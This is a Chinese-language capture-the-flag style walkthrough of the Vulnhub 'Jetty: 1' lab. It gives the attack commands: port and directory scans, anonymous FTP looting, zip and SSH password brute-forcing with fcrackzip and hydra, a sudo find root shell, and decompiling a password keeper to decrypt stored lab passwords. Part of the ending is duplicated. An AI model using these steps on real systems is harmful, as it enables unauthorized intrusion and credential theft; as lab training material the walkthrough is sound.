Vulnhub Jetty: 1
靶场搭建
下载地址:https://www.vulnhub.com/entry/jetty-1,621/
渗透测试
信息收集
探测靶机IP
arp-scan -l
端口探测
nmap -p- -sV -sC -A 192.168.131.134
21 FTP 端口
80 http
65507 ssh
其中ftp存在匿名登录漏洞
访问80端口
目录扫描
gobuster dir -u http://192.168.131.134 -w /usr/share/wordlists/dirb/big.txt -x php
发现robots.txt
访问
老三步走完开始漏洞利用环节
漏洞利用
前面发现ftp匿名登录漏洞
直接匿名登录看看
l出不来。。。
只能登陆成功
上网搜搜
wget -r ftp://192.168.131.134
总之是知道里面有东西
看不了直接全下载了
查看文件
cat README.txt
提示 zip 文件被加密,密码为公司默认密码,在观看完毕后需把 FTP 服务关闭
压缩包密码爆破
因为不知道压缩包密码,且没有发现相关信息所以只能爆破
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt sshpass.zip
解压压缩包
unzip sshpass.zip
cat sshpass.txt
记录了 SSH 的密码为Squ1d4r3Th3B3$t0fTh3W0rLd
前面扫到了65507端口就是ssh
但是不知道用户名
用户名爆破
hydra -L /usr/share/wordlists/dirb/others/names.txt -p Squ1d4r3Th3B3$t0fTh3W0rLd ssh://192.168.131.134:65507
爆破不出来可能靶场被爆破也有问题
上网搜搜
发现原来靶机前面有提示
存在账号 Squiddie
ssh squiddie@192.168.131.134 -p 65507
- Extra information:The suspicious username is Squiddie.He was in charge of the ticket selling for the Aquarium.Ethernet settings set to NAT with DHCP enabled.You should find the IP in your VLAN.
提权
使用 python3 切换 pty
python3 -c "import pty;pty.spawn('/bin/bash')"
主机上同时存在 python2 和 python3,通过 python2 交互界面进行操作
python>import pty
>pty.spawn('/bin/bash')
sudo提权
查看当前用户是否存在 sudo 权限
sudo -l
其中find命令是不需要密码
利用 find 命令提权
sudo find . -exec /bin/sh \; -quit
提权成功
切换pty
python3 -c "import pty;pty.spawn('/bin/bash')"
通过 find 命令寻找root.txt
find / -name root.txt
进入/root
目录下查看,成功发现两个文件
cat note.txtcat proof.txt
获取证据
信息收集
我们的目的不只是提权到 root 用户外还要获得证据,查看定时任务
crontab -l
表示每隔2分钟执行一次/etc/cron.daily/backup文件脚本
卡了,,,
cat /etc/cron.daily/backup
其使用 rsync 进行文件同步
文件从/root/Documents/.docs向/var/backups/.docs备份
cd /root/Documents/.docs
cd /var/backups/.docs
复制该目录下的文件至/home/ftp
目录下
cp -r /root/Documents/.docs/. /home/ftp/docs/
通过 wget 下载其中的docs
目录,最好还是先打包再下载比较好
wget -nH -m --ftp-user=ftp ftp://192.168.131.134/docs/
需要密码才能打开
查看password_keeper
目录下的文件内容
## database.txt
instagram T9Y0Ku/oDv80H8CUzBKkwQ==facebook IXKnuKh73jCOKcEZAaHnIQ==Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=
## usage.txt
Usage: *Linux: wine password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe) *Windows: password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)
This program was compiled using pyinstaller.
要想获得表格的密码,得到小程序输入的密码即可,将程序反编译,并分析代码
这个程序是用pyinstaller编译的,可以使用工具反编译得到源码
Python反编译
password_keeper.exe
他给了这个文件直接砸windows上运行即可
利用 pyinstxtractor 还原其中的文件,成功发现password_keeper.pyc
工具地址:
https://github.com/extremecoders-re/pyinstxtractor
使用 uncompyle 进行反编译,但 uncompyle6 提示需要在 python2.6-3.8 环境下执行
pip install uncompyle
uncompyle6 password_keeper.pyc > ../pass.py
源码如下:
# uncompyle6 version 3.9.1
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 3.9.8 (main, Nov 7 2021, 15:47:09)
# [GCC 11.2.0]
# Embedded file name: password_keeper.py
from Cryptodome.Cipher import AES
import base64
BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]
def cipher_message(key, message, iv):
message = pad(message)
key = base64.b64decode(key)
obj = AES.new(key, AES.MODE_CBC, iv)
ciphertext = obj.encrypt(message)
ciphertext = base64.b64encode(ciphertext)
return ciphertext
def decipher_message(key, ciphertext, iv):
ciphertext = base64.b64decode(ciphertext)
key = base64.b64decode(key)
obj2 = AES.new(key, AES.MODE_CBC, iv)
decipher_text = obj2.decrypt(ciphertext)
decipher_text = unpad(decipher_text)
return decipher_text
def generate_key(ciphertext, tag, key, iv):
ciphertext = cipher_message(key, ciphertext, iv)
print ''
print "Now copy this into your database.txt (It's the free version... pay for an automated tool!)"
print ''
print 'Tag Password'
print tag + ' ' + ciphertext
def show_keys(database, key, iv):
check_permissions = raw_input('Insert password: ')
if base64.b64encode(check_permissions) == key:
for i in range(len(database[0])):
ciphertext = database[1][i]
decipher = decipher_message(key, ciphertext, iv)
print ' '
print 'Tag: ' + database[0][i] + ' Password: ' + decipher
print ' '
else:
print ''
print 'Tag: Instagram Password: WRONG '
print 'Tag: Facebook Password: PASSWORD '
print 'Tag: SSH Password: TRY '
print 'Tag: root Password: HARDER! '
print ''
def read_database():
database = [[], []]
f = open('database.txt', 'r')
for line in f.readlines():
line = line.strip().split()
database[0].append(line[0])
database[1].append(line[1])
f.close()
return database
def main():
print 'Welcome to the best password keeper ever!'
print '__ __ _ _ __ '
print '\\ \\ / /__ __ _| | ___ _ | |/ /___ ___ _ __ ___ _ __ '
print " \\ \\ /\\ / / _ \\/ _` | |/ / | | |_____| ' // _ \\/ _ \\ '_ \\ / _ \\ '__|"
print ' \\ V V / __/ (_| | <| |_| |_____| . \\ __/ __/ |_) | __/ | '
print ' \\_/\\_/ \\___|\\__,_|_|\\_\\__, | |_|\\_\\___|\\___| .__/ \\___|_| '
print ' |___/ |_| '
iv = '166fe2294df5d0f3'
key = 'N2FlMjE4ZmYyOTI4ZjZiMg=='
database = read_database()
loop = True
while loop:
print ''
print 'Choose what you want to do: '
print '1) See your passwords!'
print '2) Generate a cipher-password'
print '3) Close'
option = raw_input('Insert your selection here --> ')
if option == '1':
print ''
print 'Showing content of your secret passwords...'
print ''
show_keys(database, key, iv)
print ''
returned = raw_input('Press any button to return to the menu...')
elif option == '2':
print ''
print ''
title = raw_input('Type the name of the application: ')
password = raw_input('Type the password(BEWARE OF SHOULDER SURFING!!!): ')
generate_key(password, title, key, iv)
print ''
print ''
returned = raw_input('Press any button to return to the menu...')
elif option == '3':
loop = False
print ''
return 'Bye Byeeeeeeeeeeeee'
print ''
print ''
print 'WHAT? FAILURE TO COMMUNICATE... Reseting connection...'
print ''
print ''
returned = raw_input('Press any button to return to the menu...')
if __name__ == '__main__':
print main()
#okay decompiling password_keeper.pyc
输入1后会调用show_keys()
函数,而该函数将输入进行 base64 编码并与 key 进行对比。模拟程序通过 base64 对 key 进行解码,成功拿到密码为7ae218ff2928f6b2
echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d
同时拿到文档的密码,从而拿到犯罪证据
Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc
过 base64 对 key 进行解码,成功拿到密码为7ae218ff2928f6b2
echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d
同时拿到文档的密码,从而拿到犯罪证据
Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc
[外链图片转存中…(img-CH9VfGL5-1712570569034)]
[外链图片转存中…(img-xPKCSIDc-1712570569034)]
[外链图片转存中…(img-eaRopq53-1712570569034)]